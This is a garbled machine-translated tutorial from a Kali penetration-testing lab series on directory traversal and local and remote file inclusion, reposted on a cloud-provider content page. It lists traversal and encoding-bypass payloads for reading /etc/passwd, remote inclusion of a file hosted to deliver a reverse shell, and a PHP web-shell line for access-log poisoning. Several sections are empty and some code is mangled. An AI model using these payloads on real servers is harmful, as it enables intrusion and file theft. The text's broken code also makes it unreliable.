Little white Diary 37:kali Penetration Testing Web Penetration-Manual vulnerability Mining (iii)-directory traversal, file inclusion

Source: Internet
Author: User
Tags php language

Manual vulnerability Mining

Vulnerability type

#Directory Traversal directory Traversal "read files on this machine's operating system"

Users can read the Web root directory "default:/var/www/" Other operating system files (such as:/etc/passwd/) through the browser/url address or parameter variable contents. Root cause: Directory permissions are not strictly restricted

#File include file contains "1, include local file contains lfi;2, remote system file contains RFI (can be passed in Trojan)"

Typically, such as the Include function, you can include directories outside the Web root directory. Root cause: The Include function restricts input variables

#此两种漏洞类型的利用方法和实现效果完全相同.

Note: Some attack vector dictionaries are integrated by default in Kali,/usr/share/wfuzz/wordlist/vulns

##################################################################

By default, metasploitable only file contains a vulnerability, no remote file contains a vulnerability

#修改metasploitable配置文件

sudo vi/etc/php5/cgi/php.ini

/allow_url Search

Sudo/etc/init.d/apache2 Restart Restart Apache Service

##########################################################################

Exploit exploits

First, observe features, characteristics, etc. "such as: page=a.php home=b.html file=content"; then the form or URL address

Classic test methods

/etc/passwd/a file that can be read by an ordinary user, often used for testing

1. file=. /.. /.. /.. /etc/password

Resolution: There are two special directories for both Windows and Linux

. Represents the current directory

.. /indicates the parent directory of the current directory (top level directory)

“.. /"The more the better, is because you can jump to the root directory

#也可以直接使用绝对路径? page=/etc/passwd, but the directory traversal vulnerability is not used, you need to use the ".. /”

2,? page=file:///etc/passwd "File system access, files are required after the absolute path"/etc/passwd

3. home=main.cgi "Source content/configuration information, etc."

4. page=http://www.a.com/1.php (contains other web files) "Remote file contains"

You can make a Web server, put a bounce shell on it

? page=http://1.1.1.1/../../../../dir/file.txt

Encoding bypasses character filtering

When prompted: Cannot find the file, you should be able to determine the filtering mechanism

Prior to php5.3, there was this bypass restriction

“.” "%00" (popular valid, denotes control) "In the PHP language format, when you encounter% 00, then ignore the contents of its back"

For example:? flie=a.doc%00.php

use a variety of coding attempts "every character can do coding attempts, usually, the ASCII code below 128 will not be filtered"

Special characters: "." " /"#英文字符肯定不会被过滤

######################################################################

#不同操作系统的路径特征字符

#类UNIX系统

Root directory:/

Directory-level delimiter:/

#windows系统

C +

Or

######################################################################

Coding

Most commonly used: URL encoding "If a layer of code is not enough to bypass, you can use double or multilayer URL encoding, if: ciphertext can be decoded by the server"

Purpose: The target server can decode the encoding normally, and can see what it wants to see, and can bypass

%2E%2E%2F decoding: /


%2E%2E%5C decoding: \
%252E%252E%255C decoding: \ "Double-layer encoding: Special character% is encoded as%25"

Unicode/utf-8 "Non-English character encoding"

.. %C0%AF decoding: /
.. %u2216
.. %C1%9C decoding: \

#可使用在线工具

######################################################################################

Characters that may be used by other system paths

? File.txt ...
? File.txt<spaces> #空格
? File.txt "" "
? file.txt<<<>>><
?./././file.txt
? nonexistant/. /file.txt #输入一个不存在的目录 "Many operating systems have been filtered"

UNC path "Windows System File Share"

? \\1.1.1.1\path\to\file.txt

Note: The common characters can be encoded in advance, in 22 or any combination, form a dictionary file, using the intruder in Burpsuite to attack can improve efficiency

######################################################################################

Exception: Unable to view any sign from the URL, its cookie in the HTTP request header

Code:

Attack: "Inject location for cookie information"

Results:

Note: Any variable must be validated

##########################################################################################

Example Demo

Local file contains Lfi

View Files

Code Execution "Special case: Implementing code injection through the server's access log"

<?php echo shell_exec ($_get[' cmd ');?



Apache access.log       " Premise: Other users have read permission to the file "

And then access the file in the browser

############################################################### ##############

Note: In a Linux system, when you assign permissions to a file, ensure that the same permissions are assigned to its hierarchical directory

# # # ##########################################################################

 

Remote file contains RFI "relatively local inclusion, low probability"

Verify:

Harm:

Low grade

Medium level

Bypass the idea "filter only once"

1. Coding

2. Mixed characters

High level limit

Little white Diary 37:kali Penetration Testing Web Penetration-Manual vulnerability Mining (iii)-directory traversal, file inclusion

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.